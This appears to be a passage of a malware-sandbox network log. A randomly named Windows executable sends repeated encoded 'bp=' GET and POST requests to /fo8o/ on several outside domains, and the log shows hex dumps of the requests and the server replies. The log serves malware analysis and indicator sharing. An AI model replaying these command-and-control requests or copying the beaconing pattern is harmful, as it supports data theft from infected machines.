bp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/7CpQU7xEmKO3HcYvy4liEGH6HbFjYJceMr+Q0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs98QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBuORrSPOKduH55uS2VuHEswTtqhBHwv4C63V5L8iD6jh4S6IfuEsb550muWnceqjpZzyLMUjjSstzqUTEzcqCh3s0GygiIiGABXNndetPURp51YCM4BQrd4vU6zDj6ZBwMzEeksp+A5NScTgSWHw+ayhmDaNg+EJ403kuMWC0X/qCbL4XKoj+Wgnfwg+CX9Q70Ap4JjvUTYSz8DsPdH2QFrZPtYnFB2Ss7h9Q4/UgwPvaa3Wk/+1UJnYmUQOFr9/VYVEey20mWWfkfqjZG/V2carnYbPufkZzPkALwkc6/x4iC9pnI7C85OmIoeaiI3tRMm0MIjOaoF6gr/jLjeU6ni2osqdmtL83+Jwj62S8cEiNIo7OXMYmpNnfDLyxdcxrFVIx1rQK43FfeSQmEeaOSdn2lH3pYEKEfsk7dwSeIb1DpA/cxDI4pPvGEuUtJfs8tRkBN9dyWS7SbTpvIkNTKtqsXIedR6y3caJX05ou05OXbdLEr+2DafkuDfyYvlEyiR+oPTnyDEr87BJUlIm5myfGz/hCMaH8qAhMeedSacIbcG7+gK9ZeYt+UYSmUQN7j2tpb1ibWO5daleZ2Qo8FyUZq [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49769	85.159.66.93	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:33:39.415436983 CET	515	OUT	GET /fo8o/?XHI=wJbPZ8pHe&bp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:34:40.131048918 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49984	91.195.240.94	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:34:45.310672998 CET	780	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 74 77 71 66 4e 4d 51 31 79 63 59 32 64 72 47 6d 77 6a 2f 46 42 50 61 38 6b 49 4c 55 6e 58 68 58 54 42 65 30 50 30 3d Data Ascii: bp=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8ptwqfNMQ1ycY2drGmwj/FBPa8kILUnXhXTBe0P0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49985	91.195.240.94	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:34:47.915703058 CET	800	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 78 38 6e 67 39 52 51 4b 4a 4e 77 52 75 71 59 69 72 2b 5a 4c 76 35 44 44 4c 62 55 2f 55 34 52 42 43 41 4a 64 66 Data Ascii: bp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBnx8ng9RQKJNwRuqYir+ZLv5DDLbU/U4RBCAJdf
Jan 6, 2025 14:34:48.655534983 CET	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 06 Jan 2025 13:34:48 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49986	91.195.240.94	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:34:50.465748072 CET	1817	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 5a 41 33 54 6c 48 6f 6d 49 7a 6d 70 4b 79 68 36 33 62 53 5a 31 66 65 45 79 6a 2f 6e 5a 33 75 6d 6c 51 4e 56 52 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 33 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 4a 38 [TRUNCATED] Data Ascii: bp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gZA3TlHomIzmpKyh63bSZ1feEyj/nZ3umlQNVRehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC3ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdFN+HqOOHs4LSir46C20h2WaW7eC3QW4PogCzq1ABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvY/idMEQnuN84DrQkl9yEHr/QZAkU1YvAd6bcquPTPdS4DMq3WNT/pNuf48eWAphVo3frnIBE7Oe8D7pck3In9ALm9G+90KsSjAUeJtA7laQxkUenNErcll/4FAW2QzPEvIQLZ1bas+Tc/CwBBOKYVQyGBcSf4KEdXQBSQWLdD2CsRN4O+pTSZ8xUOyVuX2jzxm3v85LlKbFqo/3DNqMoOtLPSZdId5yGC9dSFkECsj6eUxEfV5Tr4QzrlJ/9T/Q9IIeKl+fkl6ne3H7WML89s6JOmIvv+994w9xh2nc2sPi0b/mkR4m4EOZDuIDVl7Ig1wyvt2mikh74AIquIkSSDykGjNs5hUjFC5y07fSK/YkfSaB9s9wv0JUa6Wmr9K096ZO+26sihRIE7NNYUmT1X9p0kYdhWt6HVofiWX/1/d/Wn4XzisvVv3sm2gR24jUNOheZ7WH5tC2h60lPsIbCr2v1bnl8wn/gesZL9q/Brl3FyJjJ3nKdoHP3bj+k8a9vGQzaMR8gZSLI60IIiU [TRUNCATED]
Jan 6, 2025 14:34:51.150763035 CET	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 06 Jan 2025 13:34:51 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49987	91.195.240.94	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:34:53.007704973 CET	516	OUT	GET /fo8o/?bp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&XHI=wJbPZ8pHe HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:34:53.680147886 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 13:34:53 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Ppy0e4y/UvuEZXNNxqAwNju/CD+SVC2CH/FMRMFVowRNdNdPi96V8p2h0jD0SBSPBvRwoX3qfbExPQdx68G70Q== last-modified: Mon, 06 Jan 2025 13:34:53 GMT x-cache-miss-from: parking-7df97dc48-gpq8l server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 50 70 79 30 65 34 79 2f 55 76 75 45 5a 58 4e 4e 78 71 41 77 4e 6a 75 2f 43 44 2b 53 56 43 32 43 48 2f 46 4d 52 4d 46 56 6f 77 52 4e 64 4e 64 50 69 39 36 56 38 70 32 68 30 6a 44 30 53 42 53 50 42 76 52 77 6f 58 33 71 66 62 45 78 50 51 64 78 36 38 47 37 30 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Ppy0e4y/UvuEZXNNxqAwNju/CD+SVC2CH/FMRMFVowRNdNdPi96V8p2h0jD0SBSPBvRwoX3qfbExPQdx68G70Q==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Jan 6, 2025 14:34:53.680169106 CET	224	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi5867ng for!"><link rel="icon" type="image/png"
Jan 6, 2025 14:34:53.680200100 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 Data Ascii: href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.css v7.0.0 \|
Jan 6, 2025 14:34:53.680212021 CET	1236	IN	Data Raw: 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a Data Ascii: ,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butt
Jan 6, 2025 14:34:53.680217981 CET	1236	IN	Data Raw: 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a Data Ascii: }[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#7171
Jan 6, 2025 14:34:53.680223942 CET	672	IN	Data Raw: 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f Data Ascii: lates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a48ff}.t
Jan 6, 2025 14:34:53.680228949 CET	1236	IN	Data Raw: 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f Data Ascii: ink:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-b
Jan 6, 2025 14:34:53.680241108 CET	1236	IN	Data Raw: 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c Data Ascii: 12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:10px}.container
Jan 6, 2025 14:34:53.680248976 CET	1236	IN	Data Raw: 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 Data Ascii: tive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin-bottom
Jan 6, 2025 14:34:53.680258989 CET	104	IN	Data Raw: 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 Data Ascii: ess{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{backg
Jan 6, 2025 14:34:53.685278893 CET	1236	IN	Data Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 Data Ascii: round-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49988	66.29.149.46	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:06.947223902 CET	780	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 